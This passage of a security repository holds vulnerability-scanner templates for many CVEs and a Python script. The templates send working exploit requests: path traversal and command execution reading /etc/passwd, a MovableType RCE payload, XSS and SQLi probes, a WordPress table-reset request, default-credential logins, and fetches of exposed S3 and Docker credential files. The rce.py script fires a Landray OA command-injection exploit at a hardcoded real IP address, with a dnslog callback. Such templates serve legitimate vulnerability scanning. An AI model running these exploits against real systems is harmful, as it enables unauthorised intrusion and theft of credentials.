20 |         StringSearch("resBody", "<h1>Burp Collaborator Server</h1>") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/18394
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-5777.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-5777
 2 | info:
 3 |   name: MAGMI (Magento Mass Importer) Improper Authentication
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/index.php/catalogsearch/advanced/result/?name=e
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         StatusCode() == 503 && StringSearch("resBody", "Too many connections")
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/5777
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/comtrend-ct5367-remote-root.yaml:
--------------------------------------------------------------------------------
 1 | id: comtrend-ct5367-remote-root
 2 | 
 3 | info:
 4 |   name: COMTREND ADSL Router BTC(VivaCom) CT-5367 C01_R12 Remote Root
 5 |   author: geeknik
 6 |   reference: https://www.exploit-db.com/exploits/16275
 7 |   severity: high
 8 |   tags: comtrend,router,vivacom,iot,disclosure
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/password.cgi"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: status
18 |         status:
19 |           - 200
20 |       - type: regex
21 |         regex:
22 |           - "pwdAdmin"
23 |           - "pwdSupport"
24 |           - "pwdUser"
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/dbeaver-data-sources.yaml:
--------------------------------------------------------------------------------
 1 | id: dbeaver-data-sources
 2 | 
 3 | info:
 4 |   name: DBeaver Data Sources
 5 |   author: geeknik
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/.dbeaver/data-sources.json"
12 | 
13 |     matchers-condition: and
14 |     matchers:
15 |       - type: status
16 |         status:
17 |           - 200
18 |       - type: word
19 |         words:
20 |           - "application/json"
21 |         part: header
22 |       - type: word
23 |         words:
24 |           - '"connection-types": {'
25 |           - '"connections": {'
26 |           - '"folders": {'
27 |         condition: and
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/dockercfg.yaml:
--------------------------------------------------------------------------------
 1 | id: dockercfg
 2 | 
 3 | info:
 4 |   name: Detect .dockercfg
 5 |   author: geeknik
 6 |   description: Docker registry authentication data
 7 |   severity: high
 8 |   tags: docker,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.dockercfg"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "text/plain"
21 |       - type: word
22 |         words:
23 |           - "https"
24 |           - "email"
25 |           - "auth"
26 |         condition: and
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/redmine-cli-detect.yaml:
--------------------------------------------------------------------------------
 1 | id: redmine-cli-detect
 2 | info:
 3 |   name: Detect Redmine CLI Configuration File
 4 |   author: geeknik
 5 |   description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/
 6 |   severity: info
 7 | 
 8 | requests:
 9 |   - method: GET
10 |     path:
11 |       - "{{BaseURL}}/.redmine-cli"
12 | 
13 |     matchers-condition: and
14 |     matchers:
15 |       - type: word
16 |         part: body
17 |         words:
18 |           - default
19 |           - my_id
20 |           - root_url
21 |         condition: and
22 | 
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/s3cfg.yaml:
--------------------------------------------------------------------------------
 1 | id: s3cfg
 2 | 
 3 | info:
 4 |   name: Detect .s3cfg
 5 |   author: geeknik
 6 |   description: Amazon S3 Authentication
 7 |   severity: high
 8 |   tags: amazon,s3,auth
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/.s3cfg"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         part: header
19 |         words:
20 |           - "text/plain"
21 |       - type: word
22 |         words:
23 |           - "access_key"
24 |           - "bucket_location"
25 |           - "secret_key"
26 |         condition: and
27 |       - type: status
28 |         status:
29 |           - 200
30 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-3714.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-3714
 2 | info:
 3 |   name: Node.js Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       node_modules/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}../../../../../etc/passwd
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
21 | references:
22 |   - https://www.cvebase.com/cve/2018/3714
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-0618.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-0618
 2 | info:
 3 |   name: SQL Server Reporting Services RCE
 4 |   risk: Potential
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | replicate:
10 |   prefixes: 'REPORTSERVER, ReportServer'
11 | 
12 | requests:
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}//Pages/ReportViewer.aspx
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("body", "view report") && StringSearch("body", "ReportViewerControl")
21 | reference:
22 |   - https://www.cvebase.com/cve/2020/0618


--------------------------------------------------------------------------------
/nuclei_pocs/pinpoint-unauth.yaml:
--------------------------------------------------------------------------------
 1 | id: pinpoint-unauth
 2 | info:
 3 |   name: PinPoint Unauth
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/applications.pinpoint
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && && StringSearch("resHeaders", "application/json") && StringSearch("response", "applicationName") && StringSearch("response", "serviceType")
19 | 
20 | references:
21 |   - repo: https://github.com/naver/pinpoint


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-14849.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-14849
 2 | info:
 3 |   name: Node.js Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       static/../../../a/../../../..
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}/etc/passwd
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
21 | references:
22 |   - https://www.cvebase.com/cve/2017/14849
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2017-9506.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2017-9506
 2 | info:
 3 |   name: Jira SSRF
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       plugins/servlet/oauth/users/icon-uri
12 | requests:
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?consumerUri=https://ipinfo.io/json
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StringSearch("resBody", "ipinfo.io/missingauth")
21 | references:
22 |   - https://www.cvebase.com/cve/2017/9506
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-19719.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-19719
 2 | info:
 3 |   name: Tableau Server DOM XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       en/embeddedAuthRedirect.html
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?auth=javascript:document.write(14700+14770)
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StringSearch("resBody", "29470") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/19719
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-14181.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-14181
 2 | info:
 3 |   name: Jira User Enumeration
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       secure/ViewUserHover.jspa
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "User does not exist")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/14181
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-3187.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-3187
 2 | info:
 3 |   name: Cisco ASA & FTD Path Traversal
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       +CSCOE+/session_password.html
12 | 
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resHeader", "webvpn")
22 | references:
23 |   - https://www.cvebase.com/cve/2020/3187
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-7048.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-7048
 2 | info:
 3 |   name: Wordpress Database Reset
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/wp-admin/admin-post.php?db-reset-tables%5B%5D=comments&db-reset-code=11111&db-reset-code-confirm=11111
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         StringSearch("resHeaders", "X-Redirect-By: WordPress")
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/7048
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2021-22122.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2021-22122
 2 | info:
 3 |   name: Fortiweb XSS CVE-2021-22122
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/error3?msg=30&data=';alert('xss');//
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("body", "No policy has been chosen") && StringSearch("body", "alert('xss')")
19 | 
20 | references:
21 |   - link: https://twitter.com/ptswarm/status/1357316793753362433
22 | 


--------------------------------------------------------------------------------
/nuclei_pocs/exposed-bitkeeper.yaml:
--------------------------------------------------------------------------------
 1 | id: exposed-bitkeeper
 2 | 
 3 | info:
 4 |   name: Exposed BitKeeper Directory
 5 |   author: daffainfo
 6 |   severity: low
 7 |   reference: https://www.bitkeeper.org/man/config-etc.html
 8 |   tags: config,exposure
 9 | 
10 | requests:
11 |   - method: GET
12 |     path:
13 |       - "{{BaseURL}}/BitKeeper/etc/config"
14 | 
15 |     matchers-condition: and
16 |     matchers:
17 |       - type: word
18 |         words:
19 |           - "BitKeeper configuration"
20 |           - "logging"
21 |           - "email"
22 |           - "description"
23 |         condition: and
24 | 
25 |       - type: status
26 |         status:
27 |           - 200
28 | 


--------------------------------------------------------------------------------
/nuclei_pocs/kafdrop-xss.yaml:
--------------------------------------------------------------------------------
 1 | id: kafdrop-xss
 2 | info:
 3 |   name: KafDrop XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |       {{.root}}/topic/e'%22%3E%3Cimg%20src=x%20onerror=alert(2)%3E
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
16 |     detections:
17 |       - >-
18 |         StatusCode() == 500 && StringSearch("response", "Kafdrop") && StringSearch("response", "<img src=x onerror=alert(2)>")
19 | 
20 | references:
21 |   - author: j3ssie
22 |   - repo: https://github.com/obsidiandynamics/kafdrop


--------------------------------------------------------------------------------
/nuclei_pocs/zabbix-creds.yaml:
--------------------------------------------------------------------------------
 1 | id: zabbix-creds
 2 | info:
 3 |   name: Zabbix default credentials
 4 |   risk: High
 5 | 
 6 | requests:
 7 |   - method: POST
 8 |     redirect: false
 9 |     url: >-
10 |       {{.BaseURL}}/index.php
11 |     headers:
12 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
13 |       - Content-Type: application/x-www-form-urlencoded; charset=UTF-8
14 |       - X-Requested-With: XMLHttpRequest
15 |     body: name=Admin&password=zabbix&autologin=1&enter=Sign+in
16 |     detections:
17 |       - >-
18 |         StatusCode() == 302 && StringSearch("resHeaders", "Location: zabbix.php?action=dashboard.view")
19 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-8903.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-8903
 2 | info:
 3 |   name: TotalJS Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch("resBody", 'apache2.conf')
19 | references:
20 |   - https://www.cvebase.com/cve/2019/8903
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-24765.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-24765
 2 | info:
 3 |   name: iMind Server Information Leak
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         StatusCode() == 200 && StringSearch("resBody", 'This message is too large to display')
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/24765
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/homeworks-illumination-web-keypad.yaml:
--------------------------------------------------------------------------------
 1 | id: homeworks-illumination-web-keypad
 2 | 
 3 | info:
 4 |   name: Web Keypad for Lutron HomeWorks Illumination
 5 |   reference: https://www.lutron.com
 6 |   author: geeknik
 7 |   severity: high
 8 | 
 9 | requests:
10 |   - method: GET
11 |     path:
12 |       - "{{BaseURL}}"
13 | 
14 |     matchers-condition: and
15 |     matchers:
16 |       - type: word
17 |         words:
18 |           - "HomeWorks Illumination Web Keypad"
19 |           - "lutron.js"
20 |           - "Lutron HomeWorks"
21 |           - "Lutron Electronics, Inc."
22 |         condition: and
23 |       - type: status
24 |         status:
25 |           - 200
26 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-0296.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-0296
 2 | info:
 3 |   name: Cisco ASA Path Traversal
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       +CSCOU+/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}../+CSCOE+/files/file_list.json?path=/sessions
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "///sessions")
21 | references:
22 |   - https://www.cvebase.com/cve/2018/0296
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-11759.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-11759
 2 | info:
 3 |   name: Apache Tomcat JK Status Manager Exposed
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       jkstatus
12 |       jkstatus;
13 | requests: 
14 |   - method: GET
15 |     url: >-
16 |       {{.root}}/{{.endpoint}}
17 |     headers:
18 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
19 |     detections:
20 |       - >-
21 |         StatusCode() == 200 && StringSearch("resBody", "JK Status Manager")
22 | references:
23 |   - https://www.cvebase.com/cve/2018/11759
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-13937.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-13937
 2 | info:
 3 |   name: Apache Kylin config disclosure (CVE-2020-13937)
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: "{{.BaseURL}}"
 8 | 
 9 | requests:
10 |   - method: GET
11 |     redirect: false
12 |     url: >-
13 |      {{.root}}/kylin/api/admin/config
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
16 |     detections:
17 |       - >-
18 |         StatusCode() == 200 && StringSearch('body', 'kylin.env') && StringSearch('resHeaders', 'application/json') && StringSearch('body', 'kylin.server')
19 | reference:
20 |   - link: https://starlabs.sg/advisories/20-13937/ 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-15129.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-15129
 2 | info:
 3 |   name: Traefik Open Redirect
 4 |   risk: Medium
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 | requests: 
11 |   - method: GET
12 |     url: >-
13 |       {{.root}}/	
14 |     headers:
15 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
16 |       - X-Forwarded-Prefix: "https://foo.nl"
17 |     detections:
18 |       - >-
19 |         StatusCode() == 302 && StringSearch("resBody", "<a href=\"https://foo.nl/dashboard/\">Found</a>")
20 | 
21 | references:
22 |   - https://www.cvebase.com/cve/2020/15129
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-16270.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-16270
 2 | info:
 3 |   name: Olimpoks XSS
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       Auth/Admin
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?ErrorMessage=bb%27);alert(11470+1477+"g147");/
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "12947g147")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2019/16270
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-25213.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-25213
 2 | info:
 3 |   name: Wordpress File Manager File Upload
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | requests: 
10 |   - method: GET
11 |     url: >-
12 |       {{.root}}/wp-content/plugins/wp-file-manager/readme.txt
13 |     headers:
14 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
15 |     detections:
16 |       - >-
17 |         StatusCode() == 200 && RegexSearch("resBody", "[0-6].[0-8]") && StringSearch("resBody", "wp-file-manager")
18 | 
19 | references:
20 |   - https://www.cvebase.com/cve/2020/25213
21 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2021-20837.yaml:
--------------------------------------------------------------------------------
 1 | id: CVE-2021-20837
 2 | 
 3 | info:
 4 |   name: RCE in MovableType
 5 |   author: zin_min_phyo
 6 |   severity: critical
 7 |   reference: https://nemesis.sh/posts/movable-type-0day/
 8 |   tags: MovableType,RCE
 9 | 
10 | requests:
11 |   - method: POST
12 |     path:
13 |       - "{{BaseURL}}/cgi-bin/mt/mt-xmlrpc.cgi"
14 | 
15 |     body: '<?xml version="1.0"?><methodCall><methodName>mt.handler_to_coderef</methodName><params><param><value><base64>YGNhdCAvZXRjL3Bhc3N3ZGA=</base64></value></param></params></methodCall>'
16 | 
17 | 
18 |   
19 |     matchers:
20 |       - type: regex
21 |         regex:
22 |           - "root:.*:0:0:"
23 |         part: body
24 | 


--------------------------------------------------------------------------------
/蓝凌OA未授权/rce.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import os
 3 | # os.environ["http_proxy"] = "http://127.0.0.1:10808"
 4 | # os.environ["https_proxy"] = "http://127.0.0.1:10808"
 5 | url='http://58.210.43.88:9010/data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=function test(){ return java.lang.Runtime};r=test();r.getRuntime().exec("ping -c 4 l8ykgz.dnslog.cn")&type=1'
 6 | header = {"User-Agent":
 7 |               "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3861.400 QQBrowser/10.7.4313.400",
 8 |           'Connection': 'close'
 9 |           }
10 | req = requests.get(url=url, headers=header)
11 | print(req.text)
12 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-11248.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-11248
 2 | info:
 3 |   name: Kubelet PProf Exposed
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       debug/pprof/
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StringSearch("resBody", "Types of profiles available:") || StringSearch("resBody", "Profile Descriptions")
21 | references:
22 |   - https://www.cvebase.com/cve/2019/11248
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2018-14728.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2018-14728
 2 | info:
 3 |   name: Responsive FileManager LFI
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       filemanager/upload.php
12 | requests: 
13 |   - method: POST
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     body: |
19 |       fldr=&url=file:///etc/passwd
20 |     detections:
21 |       - >-
22 |         RegexSearch("resBody", "root:[x*]:0:0:") 
23 | references:
24 |   - https://www.cvebase.com/cve/2018/14728
25 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2019-11580.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2019-11580
 2 | info:
 3 |   name: Atlassian Crowd Data Center RCE
 4 |   risk: Critical
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 | 
 9 | variables:
10 |   - endpoint: |
11 |       crowd/plugins/servlet/exp
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?cmd=cat%20/etc/passwd
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") 
21 | references:
22 |   - https://www.cvebase.com/cve/2019/11580
23 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-11530.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-11530
 2 | info:
 3 |   name: Wordpress Chop Slider SQLi
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       wp-content/plugins/chopslider/get_script/index.php
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}?id=1111111
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StringSearch("resBody", "chopslider_id_1111111")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/11530
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-12271.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-12271
 2 | info:
 3 |   name: Sophos XG Firewall Pre-Auth SQLi
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       userportal/webpages/myaccount/login.jsp
12 | requests: 
13 |   - method: GET
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "loginstylesheet")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/12271
24 | 


--------------------------------------------------------------------------------
/nuclei_pocs/CVE-2020-24312.yaml:
--------------------------------------------------------------------------------
 1 | id: cve-2020-24312
 2 | info:
 3 |   name: Wordpress File Manager Backup Leak
 4 |   risk: High
 5 | 
 6 | params:
 7 |   - root: '{{.BaseURL}}'
 8 |   
 9 | variables:
10 |   - endpoint: |
11 |       wp-content/uploads/wp-file-manager-pro/fm_backup/
12 | requests: 
13 |   - method: POST
14 |     url: >-
15 |       {{.root}}/{{.endpoint}}
16 |     headers:
17 |       - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
18 |     detections:
19 |       - >-
20 |         StatusCode() == 200 && StringSearch("resBody", "Index of")
21 | 
22 | references:
23 |   - https://www.cvebase.com/cve/2020/24312


--------------------------------------------------------------------------------
/nuclei_pocs/ssh-known-hosts.yaml:
--------------------------------------------------------------------------------
 1 | id: ssh-known-hosts
 2 | 
 3 | info:
 4 |   name: SSH Known Hosts
 5 |   author: geeknik
